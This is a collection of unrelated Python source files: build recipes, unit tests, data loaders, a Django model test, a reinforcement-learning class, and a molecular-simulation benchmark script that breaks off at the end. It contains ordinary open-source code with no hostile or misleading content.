                "gl": self.options.gl_version,
                "gles1": self.options.gles1_version,
                "gles2": self.options.gles2_version,
                "glsc2": self.options.glsc2_version
            }
        elif self.options.spec == "egl":
            spec_api = {"egl": self.options.egl_version}
        elif self.options.spec == "glx":
            spec_api = {"glx": self.options.glx_version}
        elif self.options.spec == "wgl":
            spec_api = {"wgl": self.options.wgl_version}
        api_concat = ",".join("{0}={1}".format(api_name, api_version)
                              for api_name, api_version in spec_api.items() if api_version != "None")
        return api_concat
    def package(self):
        cmake = self._configure_cmake()
        cmake.install()
        # Drop upstream CMake config files; consumers use Conan's generators.
        tools.rmdir(os.path.join(self.package_folder, "lib", "cmake"))
        self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
    def package_info(self):
        self.cpp_info.libs = tools.collect_libs(self)
        if self.options.shared:
            # Consumers must import symbols from the shared library.
            self.cpp_info.defines = ["GLAD_GLAPI_EXPORT"]
        if self.settings.os == "Linux":
            # glad's loader uses dlopen/dlsym.
            self.cpp_info.system_libs.append("dl")
|
11521440
|
import pytest
from antu.io import Vocabulary
from collections import Counter
class TestVocabulary:
    """Unit tests for antu.io.Vocabulary.

    The expected indices follow the convention visible in these tests:
    namespaces with both padding and unknown tokens start real tokens at
    index 2, namespaces without unknown start at 1, and namespaces without
    padding or unknown start at 0; unknown lookups return 0 where allowed
    and raise RuntimeError where the namespace forbids unknowns.
    """
    def test_extend_from_pretrained_vocab(self):
        """Extend a vocabulary from pretrained token lists, with and without pad/unk."""
        vocab = Vocabulary()
        # Test extend a vocabulary from a simple pretained vocab
        pretrained_vocabs = {'glove': ['a', 'b', 'c']}
        vocab.extend_from_pretrained_vocab(pretrained_vocabs)
        assert vocab.get_token_index('a', 'glove') == 2
        assert vocab.get_token_index('c', 'glove') == 4
        assert vocab.get_token_index('d', 'glove') == 0
        # Test extend a vocabulary from a pretained vocabulary,
        # and intersect with another vocabulary.
        pretrained_vocabs = {'w2v': ['b', 'c', 'd']}
        vocab.extend_from_pretrained_vocab(pretrained_vocabs, {'w2v': 'glove'})
        assert vocab.get_token_index('b', 'w2v') == 2
        assert vocab.get_token_index('d', 'w2v') == 0
        assert vocab.get_token_from_index(2, 'w2v') == 'b'
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_from_index(4, 'w2v')
        assert excinfo.type == RuntimeError
        # Test extend a vocabulary from a no oov pretained vocabulary
        pretrained_vocabs = {'glove_nounk': ['a', 'b', 'c']}
        vocab.extend_from_pretrained_vocab(
            pretrained_vocabs, no_unk_namespace={'glove_nounk', })
        assert vocab.get_token_index('a', 'glove_nounk') == 1
        assert vocab.get_token_index('c', 'glove_nounk') == 3
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_index('d', 'glove_nounk')
        assert excinfo.type == RuntimeError
        # Test extend a vocabulary from a no oov and pad pretained vocabulary
        pretrained_vocabs = {'glove_nounk_nopad': ['a', 'b', 'c']}
        vocab.extend_from_pretrained_vocab(
            pretrained_vocabs,
            no_unk_namespace={'glove_nounk_nopad', },
            no_pad_namespace={"glove_nounk_nopad"})
        assert vocab.get_token_index('a', 'glove_nounk_nopad') == 0
        assert vocab.get_token_index('c', 'glove_nounk_nopad') == 2
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_index('d', 'glove_nounk_nopad')
        assert excinfo.type == RuntimeError
    def test_extend_from_counter(self):
        """Extend a vocabulary from token Counters, with min_count and pad/unk variants."""
        vocab = Vocabulary()
        # Test extend a vocabulary from a simple counter
        counter = {'w': Counter(["This", "is", "a", "test", "sentence", '.'])}
        vocab.extend_from_counter(counter)
        assert vocab.get_token_index('a', 'w') == 4
        assert vocab.get_token_index('.', 'w') == 7
        assert vocab.get_token_index('That', 'w') == 0
        # Test extend a vocabulary from a counter with min_count
        counter = {'w_m': Counter(['This', 'is', 'is'])}
        min_count = {'w_m': 2}
        vocab.extend_from_counter(counter, min_count)
        assert vocab.get_token_index('is', 'w_m') == 2
        assert vocab.get_token_index('This', 'w_m') == 0
        assert vocab.get_token_index('That', 'w_m') == 0
        # Test extend a vocabulary from a counter without oov token
        counter = {'w_nounk': Counter(['This', 'is'])}
        vocab.extend_from_counter(counter, no_unk_namespace={'w_nounk', })
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_index('That', 'w_nounk')
        assert excinfo.type == RuntimeError
        assert vocab.get_token_index('This', 'w_nounk') == 1
        # Test extend a vocabulary from a counter without pad & unk token
        counter = {'w_nounk_nopad': Counter(['This', 'is', 'a'])}
        vocab.extend_from_counter(
            counter,
            no_unk_namespace={'w_nounk_nopad'},
            no_pad_namespace={'w_nounk_nopad'})
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_index('That', 'w_nounk_nopad')
        assert excinfo.type == RuntimeError
        assert vocab.get_token_index('This', 'w_nounk_nopad') == 0
    def test_vocabulary(self):
        """Build a Vocabulary with all options at once; expectations mirror the
        two incremental tests above."""
        pretrained_vocabs = {
            'glove': ['a', 'b', 'c'],
            'w2v': ['b', 'c', 'd'],
            'glove_nounk': ['a', 'b', 'c'],
            'glove_nounk_nopad': ['a', 'b', 'c']}
        counters = {
            'w': Counter(["This", "is", "a", "test", "sentence", '.']),
            'w_m': Counter(['This', 'is', 'is']),
            'w_nounk': Counter(['This', 'is']),
            'w_nounk_nopad': Counter(['This', 'is', 'a'])}
        vocab = Vocabulary(
            counters=counters,
            min_count={'w_m': 2},
            pretrained_vocab=pretrained_vocabs,
            intersection_vocab={'w2v': 'glove'},
            no_pad_namespace={'glove_nounk_nopad', 'w_nounk_nopad'},
            no_unk_namespace={
                'glove_nounk', 'w_nounk', 'glove_nounk_nopad', 'w_nounk_nopad'})
        # Test glove
        print(vocab.get_vocab_size('glove'))
        assert vocab.get_token_index('a', 'glove') == 2
        assert vocab.get_token_index('c', 'glove') == 4
        assert vocab.get_token_index('d', 'glove') == 0
        # Test w2v
        assert vocab.get_token_index('b', 'w2v') == 2
        assert vocab.get_token_index('d', 'w2v') == 0
        assert vocab.get_token_from_index(2, 'w2v') == 'b'
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_from_index(4, 'w2v')
        assert excinfo.type == RuntimeError
        # Test glove_nounk
        assert vocab.get_token_index('a', 'glove_nounk') == 1
        assert vocab.get_token_index('c', 'glove_nounk') == 3
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_index('d', 'glove_nounk')
        assert excinfo.type == RuntimeError
        # Test glove_nounk_nopad
        assert vocab.get_token_index('a', 'glove_nounk_nopad') == 0
        assert vocab.get_token_index('c', 'glove_nounk_nopad') == 2
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_index('d', 'glove_nounk_nopad')
        assert excinfo.type == RuntimeError
        # Test w
        assert vocab.get_token_index('a', 'w') == 4
        assert vocab.get_token_index('.', 'w') == 7
        assert vocab.get_token_index('That', 'w') == 0
        # Test w_m
        assert vocab.get_token_index('is', 'w_m') == 2
        assert vocab.get_token_index('This', 'w_m') == 0
        assert vocab.get_token_index('That', 'w_m') == 0
        # Test w_nounk
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_index('That', 'w_nounk')
        assert excinfo.type == RuntimeError
        assert vocab.get_token_index('This', 'w_nounk') == 1
        # Test w_nounk_nopad
        with pytest.raises(RuntimeError) as excinfo:
            vocab.get_token_index('That', 'w_nounk_nopad')
        assert excinfo.type == RuntimeError
        assert vocab.get_token_index('This', 'w_nounk_nopad') == 0
|
11521445
|
import argparse
from datetime import datetime
from dateutil.parser import isoparse
def parse_args(arguments=None):
    """Example of argparse with different inputs.

    Args:
        arguments (list, optional): Arguments passed as a list of strings.
            This argument can be used when calling the function from a
            notebook.  When using the command line leave it as ``None``
            and the arguments are read from ``sys.argv``.

    Returns:
        argparse.Namespace: The parsed arguments.

    Examples:
        >>> cmd = 'AAA -ms BBB -si -l 1 2 3'
        >>> args = parse_args(['AAA', '-ms', 'BBB', '-si', '-l', '1', '2', '3', '-d', '2020-01-06'])
        Mandatory string: AAA
        Mandatory string -ms: BBB
        Store true -si: True
        Input list ['1', '2', '3'], type: <class 'list'>
        Default list [7, 77, 777], type: <class 'list'>
        Date: 06/01/2020, 00:00:00
    """
    parser = argparse.ArgumentParser(
        description="Parser", formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )
    # here we can't put 'mandatory-string' (positional names can't have dashes)
    parser.add_argument(
        "mandatory_string", type=str, help="Help mandatory string param"
    )
    parser.add_argument(
        "-os",
        "--opt-str",
        type=str,
        default="Optional string",
        help="Help optional string",
    )
    parser.add_argument(
        "-ms", "--mand-str", type=str, help="Help mandatory string", required=True
    )
    parser.add_argument("-i", "--int-param", type=int, default=7, help="Help int param")
    parser.add_argument(
        "-f", "--float-param", type=float, default=7.7, help="Help float param"
    )
    parser.add_argument(
        "-si", "--me-gusta", action="store_true", help="Help for true parameter"
    )
    parser.add_argument(
        "-no", "--no-me-gusta", action="store_false", help="Help false parameter"
    )
    parser.add_argument(
        "-l",
        "--list",
        nargs="+",
        help="List of arguments, ex: python argument_io.py -l 1 2 3",
    )
    parser.add_argument(
        "-d",
        "--date",
        default=datetime.now().isoformat(),
        type=isoparse,
        help="Date for an event (format: YYYY-MM-DD)",
    )
    # Defaults that exist even though no corresponding option is declared.
    parser.set_defaults(my_list=[7, 77, 777], my_string="bazinga")
    # BUG FIX: the default used to be a mutable list (`arguments=[]`), which is
    # shared across calls.  With the `None` sentinel, parse_args(None) falls
    # back to sys.argv automatically, so a single call covers both the
    # notebook and the command-line case.
    args = parser.parse_args(arguments)
    print("Mandatory string:", args.mandatory_string)
    print("Mandatory string -ms:", args.mand_str)
    print("Store true -si:", args.me_gusta)
    print("Input list {}, type: {}".format(args.list, type(args.list)))
    print("Default list {}, type: {}".format(args.my_list, type(args.my_list)))
    print("Date: {}".format(args.date.strftime("%d/%m/%Y, %H:%M:%S")))
    return args
if __name__ == "__main__":
parse_args()
|
11521484
|
import numpy as np
from scipy.io import loadmat
from collections import Counter
from keras.utils import to_categorical
from sklearn.model_selection import train_test_split
def mat2array():
    """Load the Indian Pines cube and ground truth, standardising each band.

    Returns:
        (data, gt): the hyperspectral cube as float32 with every spectral
        band standardised to zero mean / unit variance, and the raw
        ground-truth label map.
    """
    cube = loadmat('Indian_pines_corrected.mat')['indian_pines_corrected'].astype(np.float32)
    labels = loadmat('Indian_pines_gt.mat')['indian_pines_gt']
    for band in range(cube.shape[-1]):
        channel = cube[:, :, band]
        cube[:, :, band] = (channel - np.mean(channel)) / np.std(channel)
    return cube, labels
def load_data():
    """Assemble train/validation patch splits and per-class loss weights.

    Returns:
        (trainX, valX, trainY, valY, weights_dict): a 75/25 split of the
        real + synthetic patches, plus a dict mapping each of the 16 class
        indices to a log10 inverse-frequency weight.
    """
    data, gt = mat2array()
    train_patches, train_patches_gt = load_patches(data, gt)
    # Augment the real patches with synthetic ones built from small windows.
    train_patches_synthetic, train_patches_gt_synthetic = load_synthetic_patches(data, gt)
    train_patches = np.concatenate((train_patches, train_patches_synthetic), axis=0)
    train_patches_gt = np.concatenate((train_patches_gt, train_patches_gt_synthetic), axis=0)
    trainX, valX, trainY, valY = train_test_split(train_patches, train_patches_gt, test_size=0.25, random_state=42)
    # Class weights: log10(total / count) per class, derived from the one-hot labels.
    # NOTE(review): assumes all 16 classes occur in the training split — a
    # missing class would raise KeyError at instances[i]; confirm for small splits.
    instances = dict(Counter(list(np.argmax(trainY, axis=3).ravel())))
    total = sum(instances.values())
    weights = np.log10([total/instances[i] for i in range(16)])
    weights_dict = dict([(i, j) for i,j in enumerate(weights)])
    return trainX, valX, trainY, valY, weights_dict
def load_patches(data, gt, patch_size = 4):
    """Extract every fully-labelled window of side *patch_size*.

    Windows containing any unlabelled pixel (class 0) are skipped; labels
    are shifted to 0-based and one-hot encoded over 16 classes.
    """
    windows = []
    window_labels = []
    for row in range(data.shape[0] - patch_size):
        for col in range(data.shape[1] - patch_size):
            label_window = gt[row:row + patch_size, col:col + patch_size].copy()
            # Keep only windows where every pixel carries a real class label.
            if np.any(label_window == 0):
                continue
            windows.append(data[row:row + patch_size, col:col + patch_size, :].copy())
            window_labels.append(label_window)
    window_array = np.array(windows)
    onehot_labels = to_categorical(np.array(window_labels) - 1, num_classes=16)
    return window_array, onehot_labels
def load_synthetic_patches(data, gt, patch_size = 4, small_patch_size = 1, oversample = 12, label_choice = 8):
    """Generate synthetic patches by tiling small single-class windows.

    Collects every fully-labelled ``small_patch_size`` window per class,
    then builds ``oversample`` patches of side ``patch_size`` by filling
    them with randomly chosen windows of class ``label_choice``.

    Returns:
        (patches, patches_gt): arrays of shape
        (oversample, patch_size, patch_size, 200) and one-hot labels of
        shape (oversample, patch_size, patch_size, 16).
    """
    patches_small = [[] for _ in range(16)] #16 classes
    patches_gt_small = [[] for _ in range(16)]
    # Harvest all small windows whose every pixel is labelled (no class 0).
    for i in range(data.shape[0] - small_patch_size):
        for j in range(data.shape[1] - small_patch_size):
            patch = (data[i:i+small_patch_size, j:j+small_patch_size, :]).copy()
            patch_gt = (gt[i:i+small_patch_size, j:j+small_patch_size]).copy()
            if np.any(patch_gt == 0):
                continue
            else:
                # NOTE(review): the class comes from the window's top-left pixel;
                # with small_patch_size > 1 mixed-class windows would be
                # mislabelled — confirm small_patch_size stays 1.
                index = patch_gt[0,0] - 1
                patches_small[index].append(patch)
                patches_gt_small[index].append(patch_gt)
    patches_small = [np.array(patches_small[i]) for i in range(16)]
    patches_gt_small = [(np.array(patches_gt_small[i]) - 1) for i in range(16)]
    ## Mixed patches
    patches = []
    patches_gt = []
    for sample in range(int(oversample)):
        new_patch = np.zeros((patch_size, patch_size, 200))
        new_patch_gt = np.zeros((patch_size, patch_size))
        for i in range(0, patch_size, small_patch_size):
            for j in range(0, patch_size, small_patch_size):
                # Draw only from the first 75% of that class's windows —
                # presumably to keep the remainder unseen; verify against the
                # train/validation split policy.
                index_choice = np.random.randint(int(len(patches_small[label_choice]) * 0.75))
                new_patch[i:i+small_patch_size, j:j+small_patch_size, :] = patches_small[label_choice][index_choice]
                new_patch_gt[i:i+small_patch_size, j:j+small_patch_size] = patches_gt_small[label_choice][index_choice]
        patches.append(new_patch)
        patches_gt.append(new_patch_gt)
    patches = np.array(patches)
    patches_gt = np.array(patches_gt)
    patches_gt = to_categorical(patches_gt, num_classes=16)
    return patches, patches_gt
|
11521509
|
from juliabox.jbox_util import gen_random_secret
from juliabox.db import JBPluginDB, JBoxDBItemNotFound
__author__ = 'barche'
class EmailVerifyDB(JBPluginDB):
    """Table plugin storing per-user email verification state.

    Each row keys on ``user_id`` and holds the email address, a random
    verification code, and an ``is_verified`` flag stored as 0/1.
    """
    provides = [JBPluginDB.JBP_TABLE_RDBMS]
    NAME = 'jbox_email_verify'
    TABLE = None
    KEYS = ['user_id']
    ATTRIBUTES = ['email', 'verification_code', 'is_verified']
    SQL_INDEXES = None
    KEYS_TYPES = [JBPluginDB.VCHAR]
    TYPES = [JBPluginDB.VCHAR, JBPluginDB.VCHAR, JBPluginDB.INT]
    def __init__(self, user_id):
        # Lazily create the row on first access: a fresh row starts with an
        # empty email, a newly generated verification code, and unverified status.
        count = self.query_count(user_id__eq=user_id)
        create = (count == 0)
        if create:
            data = {
                'user_id': user_id,
                'email': '',
                'verification_code': gen_random_secret(),
                'is_verified': 0
            }
            self.create(data)
        self.item = self.fetch(user_id=user_id)
        # True when this call created the row.
        self.is_new = create
    def set_email(self, email):
        """Store *email* for this user (does not regenerate the verification code)."""
        self.set_attrib('email', email)
        self.save()
    def verify(self, verification_code):
        """Mark the user verified if *verification_code* matches; return success."""
        if self.get_attrib('verification_code') == verification_code:
            self.set_attrib('is_verified', 1)
            self.save()
            return True
        return False
    def get_code(self):
        """Return the stored verification code."""
        return self.get_attrib('verification_code')
    def is_verified(self):
        """Return True when the stored flag equals 1."""
        if self.get_attrib('is_verified') == 1:
            return True
        return False
|
11521517
|
import os
import sys
sys.path.append('/solution')
import matplotlib
import matplotlib as mlp
mlp.rcParams['font.family'] = u'NanumGothic'
mlp.rcParams['font.size'] = 10
import pandas as pd
pd.set_option('io.hdf.default_format', 'table') # default hdf format 'table'
from pandas import Series, DataFrame
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style('darkgrid', {'font.family': [u'NanumGothic']})
from wzdat.util import hdf_path, hdf_exists, get_notebook_rpath, get_notebook_dir
from wzdat.notebook_runner import NoDataFound
from wzdat.manifest import Manifest, ManifestNotExist
# Resolve this notebook's path — prefer the injected `__nbpath__` global when
# the runner provides it, otherwise derive the relative path — and load the
# notebook's manifest; the manifest is optional.
try:
    nbrpath = __nbpath__ if '__nbpath__' in globals() else\
        get_notebook_rpath(False)
    nbapath = os.path.join(get_notebook_dir(), nbrpath)
    manifest_ = Manifest(True, nbapath)
except ManifestNotExist:
    # No manifest for this notebook: downstream code must handle None.
    manifest_ = None
import os
|
11521536
|
from setuptools import find_packages, setup
from setuptools.extension import Extension

# The long description ships straight from the README included in the sdist.
with open('README.rst') as readme:
    long_description = readme.read()

_DESCRIPTION = (
    'Library providing functions to calculate Levenshtein distance, Optimal String Alignment distance, '
    'and Damerau-Levenshtein distance, where the cost of each operation can be weighted by letter.'
)

_CLASSIFIERS = [
    'Development Status :: 3 - Alpha',
    'Intended Audience :: Developers',
    'License :: OSI Approved :: MIT License',
    'Operating System :: POSIX :: Linux',
    'Programming Language :: Cython',
    'Programming Language :: Python :: 2',
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3',
    'Programming Language :: Python :: 3.6',
    'Topic :: Software Development :: Libraries :: Python Modules',
    'Topic :: Text Processing :: Linguistic',
]

setup(
    name='weighted_levenshtein',
    version='0.2.1',
    description=_DESCRIPTION,
    long_description=long_description,
    url='https://github.com/infoscout/weighted-levenshtein',
    author='<NAME> (InfoScout)',
    author_email='<EMAIL>',
    license='MIT',
    classifiers=_CLASSIFIERS,
    keywords='Levenshtein Damerau weight weighted distance',
    test_suite='test.test',
    packages=find_packages(exclude=('test', 'docs',)),
    # Ship the Cython sources alongside the compiled extension.
    package_data={
        'weighted_levenshtein': ['clev.pxd', 'clev.pyx'],
    },
    setup_requires=[
        # Setuptools 18.0 properly handles Cython extensions.
        'setuptools >= 18.0',
        'cython',
    ],
    ext_modules=[Extension("weighted_levenshtein.clev", ['weighted_levenshtein/clev.pyx'])],
)
|
11521559
|
from os import path
from django.contrib.auth.models import User
from django.test import TestCase
from django.urls import reverse
from files.models import CaptionedFile
fixture_dir = path.join(path.abspath(path.dirname(__file__)), 'fixtures')
class CaptionedFileTestCase(TestCase):
    """CRUD round-trip tests for the CaptionedFile model."""

    def setUp(self):
        # `publication` is a plain relative file name; the original wrapped it
        # in a pointless single-argument path.join(). objects.create() already
        # persists the row, so the extra save() was redundant too.
        self.captioned_file = CaptionedFile.objects.create(
            caption="this is a file",
            publication='pubtest.txt'
        )

    def test_creation(self):
        """A second create() yields two rows (setUp already made one)."""
        CaptionedFile.objects.create(
            caption="lo lo",
            publication='pubtest.txt'
        )
        self.assertEqual(CaptionedFile.objects.count(), 2)

    def test_update(self):
        """Saving a changed caption persists it."""
        self.captioned_file.caption = "I like text files"
        self.captioned_file.save()
        cf = CaptionedFile.objects.get()
        self.assertEqual(cf.caption, "I like text files")

    def test_delete(self):
        """Deleting the only row leaves an empty table."""
        cf = CaptionedFile.objects.get()
        cf.delete()
        self.assertEqual(CaptionedFile.objects.count(), 0)
class MultiEncodedAdminFormTest(TestCase):
    """Admin-view fixture: creates a superuser and resolves the create URL."""
    def setUp(self):
        # '<PASSWORD>' is a placeholder left by source sanitizing, not a real secret.
        self.user = User(
            username='admin',
            is_staff=True,
            is_superuser=True)
        self.user.set_password('<PASSWORD>')
        self.user.save()
        # URL of the djangoadmin2 create view for CaptionedFile.
        self.create_url = reverse('admin2:example3_captioned_file_create')
|
11521598
|
import sys
import os
from pathlib import Path
from appdirs import user_config_dir
from .version import Version
__all__ = ("__version__", "appdata", "cachepath", "cache", "lang", "theme")
__version__ = Version(180501)
# Per-user config directory and the on-disk cache file inside it.
appdata = user_config_dir('omnitool', "", roaming=True)
cachepath = os.path.join(appdata, "cache.dill")
##filled in by omnitool\__init__.py:
cache = None
lang = None
theme = None
exit_prog = None
cores = 1 # amount of cpu cores
##end of autofill
# Frozen builds (e.g. PyInstaller) keep data files next to the executable;
# source checkouts keep them next to this module.
if getattr(sys, 'frozen', False):
    datadir = Path(sys.executable).parent
else:
    datadir = Path(__file__).parent
# Never-executed import gives IDEs a concrete module to resolve `lang` against.
if False:
    from .Language import english as lang # IDE hook
11521617
|
import torch
from mmaction.datasets import CutmixBlending, MixupBlending
def test_mixup():
    """MixupBlending preserves image shape and one-hot-sizes labels (NCHW and NCTHW)."""
    alpha = 0.2
    num_classes = 10
    label = torch.randint(0, num_classes, (4, ))
    mixup = MixupBlending(num_classes, alpha)

    # Same checks for 4-D-per-clip (NCHW) and 5-D-per-clip (NCTHW) batches.
    for img_shape in ((4, 4, 3, 32, 32), (4, 4, 2, 3, 32, 32)):
        imgs = torch.randn(*img_shape)
        mixed_imgs, mixed_label = mixup(imgs, label)
        assert mixed_imgs.shape == torch.Size(img_shape)
        assert mixed_label.shape == torch.Size((4, num_classes))
def test_cutmix():
    """CutmixBlending preserves image shape and one-hot-sizes labels (NCHW and NCTHW)."""
    alpha = 0.2
    num_classes = 10
    label = torch.randint(0, num_classes, (4, ))
    # Fix: the blender under test is CutmixBlending; the original bound it to
    # a variable named `mixup` (copy-paste from test_mixup), which was misleading.
    cutmix = CutmixBlending(num_classes, alpha)
    # NCHW imgs
    imgs = torch.randn(4, 4, 3, 32, 32)
    mixed_imgs, mixed_label = cutmix(imgs, label)
    assert mixed_imgs.shape == torch.Size((4, 4, 3, 32, 32))
    assert mixed_label.shape == torch.Size((4, num_classes))
    # NCTHW imgs
    imgs = torch.randn(4, 4, 2, 3, 32, 32)
    mixed_imgs, mixed_label = cutmix(imgs, label)
    assert mixed_imgs.shape == torch.Size((4, 4, 2, 3, 32, 32))
    assert mixed_label.shape == torch.Size((4, num_classes))
|
11521619
|
import copy
import numpy as np
from sarsa import Sarsa
class DoubleQLearning(Sarsa):
    """Tabular Double Q-learning built on the Sarsa base class.

    Maintains two Q tables (self.Q_l); each backup randomly picks one table
    to update and uses the other to evaluate the greedy action, which removes
    the maximization bias of single-table Q-learning. Relies on the base
    class for `best_action`, `eps_gre`, `pol_deriv`, `Q`, `step_size`, `gamma`.
    """
    def __init__(self, env, step_size=0.1, gamma=1, eps=0.1, pol_deriv=None):
        super().__init__(env, step_size, gamma, eps, pol_deriv)
        # Purely greedy policy (epsilon = 0), kept for evaluation.
        self.greedy_pol = self.eps_gre(eps=0)
        self.reset()
        print(f"gamma={self.gamma}")
        print(f"eps={eps}")
        print(f"step_size={self.step_size}")
    def double_q_learning_update(self, s, a, r, s_p):
        """One double-Q backup for transition (s, a, r, s_p)."""
        # Coin flip decides which table gets updated (Q_1) and which scores (Q_2).
        Q_1, Q_2 = self.Q_l if np.random.random() < 0.5 else self.Q_l[::-1]
        # Greedy next action according to the table being updated.
        a_max_Q_1 = self.best_action(self.env.moves_d[s_p], np.array([Q_1[(s_p, a)] for a in self.env.moves_d[s_p]]))
        Q_1[(s, a)] += self.step_size * (r + self.gamma * Q_2[(s_p, a_max_Q_1)] - Q_1[(s, a)])
    def double_q_learning_log_actions(self, n_episodes, to_log_s, to_log_a):
        """Run episodes and return, per episode, the percentage of visits to
        `to_log_s` on which `to_log_a` was chosen."""
        per_l = []
        for ep_nb in range(n_episodes):
            s = self.env.reset()
            nb_a, nb_s = 0, 0
            while True:
                a = self.pol_deriv(s)
                s_p, r, d, _ = self.env.step(a)
                nb_s += (s == to_log_s)
                nb_a += (a == to_log_a) * (s == to_log_s)
                self.double_q_learning_update(s, a, r, s_p)
                # Keep the combined estimate in sync for the acting policy.
                self.update_Q(s, a)
                if d:
                    # NOTE(review): divides by nb_s — raises ZeroDivisionError if
                    # the episode never visits `to_log_s`; confirm that cannot happen.
                    per_l.append(100 * (nb_a / nb_s))
                    break
                s = s_p
        return per_l
    def update_Q(self, s, a):
        # Combined estimate: sum of both tables (used by the base-class policy).
        self.Q[(s, a)] = sum(Q[(s, a)] for Q in self.Q_l)
    def reset(self):
        super().reset()
        # Two independent copies of the base-class Q table.
        self.Q_l = [copy.deepcopy(self.Q) for _ in range(2)]
11521638
|
# Re-export the diploma services so callers can import them from this
# package directly (e.g. `from diplomas.services import DiplomaGenerator`).
from diplomas.services.diploma_generator import DiplomaGenerator
from diplomas.services.diploma_regenerator import DiplomaRegenerator
__all__ = [
    'DiplomaGenerator',
    'DiplomaRegenerator',
]
|
11521687
|
from simtk import unit
import sys
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
from openmmtools.constants import kB
import matplotlib.pyplot as plt
################################################################################
# NUMBER OF ATTEMPTS
################################################################################
# NOTE(review): nequil is currently unused — the equilibration call below is
# commented out (it disturbs the samplers' iteration counters).
nequil = 10
niterations = 200
use_sterics = False
ENV = 'vacuum'
################################################################################
# CONSTANTS
################################################################################
temperature = 300.0 * unit.kelvin
kT = kB * temperature
beta = 1.0/kT
# Alchemical lambda schedules. "hybrid": every component tracks the master
# lambda linearly. "two-stage": sterics switch over the first half of the
# protocol, electrostatics over the second half; valence terms stay on.
functions_hybrid = {
    'lambda_sterics' : 'lambda',
    'lambda_electrostatics' : 'lambda',
    'lambda_bonds' : 'lambda',
    'lambda_angles' : 'lambda',
    'lambda_torsions' : 'lambda',
    }
functions_twostage = {
    'lambda_sterics' : '(2*lambda)^(1./6.) * step(0.5 - lambda) + (1.0 - step(0.5 - lambda))',
    'lambda_electrostatics' : '2*(lambda - 0.5) * step(lambda - 0.5)',
    'lambda_bonds' : '1.0',
    'lambda_angles' : '1.0',
    'lambda_torsions' : '1.0'
    }
def plot_logPs(logps, molecule_name, scheme, component):
    """
    Plot the mean +/- standard deviation of logP values against the total
    number of NCMC steps (log-scaled x axis) and save the figure to disk.

    Parameters
    ----------
    logps: dict { int : np.ndarray }
        key : number of total NCMC steps
        value : array of `niterations` logP values
    molecule_name : str
        The molecule featured in the NullTestSystem being analyzed
        in ['naphthalene','butane','propane']
    scheme : str
        Which NCMC scheme is being used
        in ['hybrid','two-stage']
    component : str
        Which logP is being plotted
        in ['NCMC','EXEN']
    """
    steps = sorted(logps)
    means = [logps[n].mean() for n in steps]
    devs = [logps[n].std() for n in steps]
    # Shaded one-standard-deviation band around the mean curve.
    lower = [m - d for m, d in zip(means, devs)]
    upper = [m + d for m, d in zip(means, devs)]
    plt.fill_between(steps, lower, upper)
    plt.plot(steps, means, 'k')
    plt.xscale('log')
    plt.title("{0} {1} {2} {3}".format(ENV, molecule_name, scheme, component))
    plt.ylabel('logP')
    plt.xlabel('ncmc steps')
    plt.tight_layout()
    plt.savefig('{0}_{1}_{2}{3}_logP'.format(ENV, molecule_name, scheme, component))
    print('Saved plot to {0}_{1}_{2}{3}_logP.png'.format(ENV, molecule_name, scheme, component))
    plt.clf()
def benchmark_exen_ncmc_protocol(analyses, molecule_name, scheme):
    """
    For each combination of system and scheme, results are analyzed for
    the following:
    * Over the whole range of total steps:
        * Plot mean and standard deviation of NCMC logP as a function of
          total steps
        * Plot mean and standard deviation of EXEN logP as a function of
          total steps
    Parameters
    ----------
    analyses : dict { int : perses.Analysis }
        key : number of total NCMC steps
        value : analysis object contained stored information
    molecule_name : str
        The molecule featured in the NullTestSystem being analyzed
        in ['naphthalene','butane','propane']
    scheme : str
        Which NCMC scheme is being used
        in ['hybrid','two-stage']
    Creates 2 plots every time it is called
    """
    # Build a list of all logP components:
    # NOTE(review): `components` maps each name to itself — effectively a set;
    # kept as-is since plot_logPs is passed components[component] below.
    components = dict()
    for nsteps, analysis in analyses.items():
        ee_sam = analysis._ncfile.groups['ExpandedEnsembleSampler']
        for name in ee_sam.variables.keys():
            if name.startswith('logP_'):
                components[name] = name
    for component in components.keys():
        # Broad except: a failure plotting one component must not abort the
        # rest of the benchmark; the error is printed and the loop continues.
        try:
            print('Finding {0} over nsteps for {1} with {2} NCMC'.format(component, molecule_name, scheme))
            # Collect this component's per-iteration logP values for each step count.
            logps = dict()
            for nsteps, analysis in analyses.items():
                ee_sam = analysis._ncfile.groups['ExpandedEnsembleSampler']
                niterations = ee_sam.variables[component].shape[0]
                logps[nsteps] = np.zeros(niterations, np.float64)
                for n in range(niterations):
                    logps[nsteps][n] = ee_sam.variables[component][n]
            plot_logPs(logps, molecule_name, scheme, components[component])
        except Exception as e:
            print(e)
def benchmark_ncmc_work_during_protocol():
    """
    Run 50 iterations of ExpandedEnsembleSampler for NullTestSystems
    over a range of total NCMC steps [0, 1, 10, 100, 1000, 10000].
    Benchmark is repeated for Naphthalene, Butane, and Propane test
    systems, using two-stage and hybrid NCMC.
    For each combination of system and scheme, results are analyzed for
    the following:
    * For a given total number of steps:
        * For NCMC steps 100 and above, plot work done by ncmc integrator
          over the course of the protocol
        * Plot histograms of the contributions of each component to the
          overall log acceptance probability
    * Over the whole range of total steps:
        * Plot mean and standard deviation of NCMC logP as a function of
          total steps
        * Plot mean and standard deviation of EXEN logP as a function of
          total steps
    """
    from perses.tests.testsystems import ButaneTestSystem
    from perses.analysis import Analysis
    # NOTE(review): only butane is currently enabled; the other systems in the
    # docstring are commented out (their imports are gone too).
    molecule_names = {
        #'propane' : PropaneTestSystem,
        'butane' : ButaneTestSystem,
        #'naphthalene' : NaphthaleneTestSystem,
    }
    # scheme label -> (proposal scheme string, lambda-function dict defined above)
    methods = {
        'hybrid' : ['geometry-ncmc-geometry', functions_hybrid],
        'two-stage' : ['ncmc-geometry-ncmc', functions_twostage],
    }
    for molecule_name, NullProposal in molecule_names.items():
